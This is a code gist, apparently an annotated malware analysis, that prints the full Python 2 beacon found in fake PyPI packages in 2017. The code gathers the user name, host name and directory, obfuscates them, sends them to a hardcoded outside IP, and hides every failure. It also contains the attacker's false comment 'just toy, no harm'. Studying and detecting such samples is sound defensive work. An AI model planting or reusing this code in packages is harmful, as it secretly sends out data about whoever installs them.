@HorlogeSkynet
Created September 16, 2017 13:41
Malicious snippet from fake packages present on PyPI, from July to September 2017
#!/usr/bin/env python2
# DO NO EXECUTE THIS -- For analysis only
# Reviewed by Samuel FORESTIER
try:
    import os
    import pwd
    import socket
    import base64
    # Host fingerprint: last component of the current working directory,
    # login name of the invoking user, and the machine's host name.
    soft = os.getcwd().split('/')[-1]
    u = pwd.getpwuid(os.getuid()).pw_name
    hname = socket.gethostname()
    rawd = 'Y:%s %s %s' % (soft, u, hname)
    # Obfuscation, not encryption: a repeating 5-byte XOR key followed by
    # base64. The plaintext is recoverable from a packet capture with the
    # same key, which is what makes this beacon analysable after the fact.
    encd = ''
    t = [0x76, 0x21, 0xfe, 0xcc, 0xee]
    for i in xrange(len(rawd)):
        encd += chr(ord(rawd[i]) ^ t[i % len(t)])
    # The request line is assembled from fragments so that "GET" and
    # "HTTP/1.1" never appear literally in the file. The encoded fingerprint
    # is sent as the URL path of a bare HTTP/1.1 request with no headers at
    # all (not even Host), which is itself a usable detection signature.
    p = ('G' + 'E' + 'T /%s ' + 'H' + 'T' + 'T' + 'P/1.1\r\n') % (
        base64.b64encode(encd)) + '\r\n' * 2
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Short timeout so an unreachable collector does not stall the caller;
    # the failure is then swallowed by the except below.
    s.settimeout(4)
    # Destination is likewise fragmented and base64-encoded:
    # 'MTIxLjQyLjIxNy40NA==' decodes to 121.42.217.44, and 017620 is a
    # Python 2 octal literal for port 8080. Outbound TCP to
    # 121.42.217.44:8080 carrying a GET whose path is a base64 blob is the
    # network indicator to look for.
    rip = 'M' + 'TIxL' + 'jQyL' + 'jIx' + 'N' + 'y4' + '0NA' + '=='
    s.connect((base64.b64decode(rip), 017620))
    s.sendall(p)
    # Fire-and-forget: the response is never read.
    s.close()
except Exception, e:
    # Welcome Here! :)
    # just toy, no harm :)
    # Every failure (no network, pwd lookup error, DNS/connect refusal) is
    # silently discarded, so whatever imports or installs this code keeps
    # running without any error or log line that would reveal the beacon.
    pass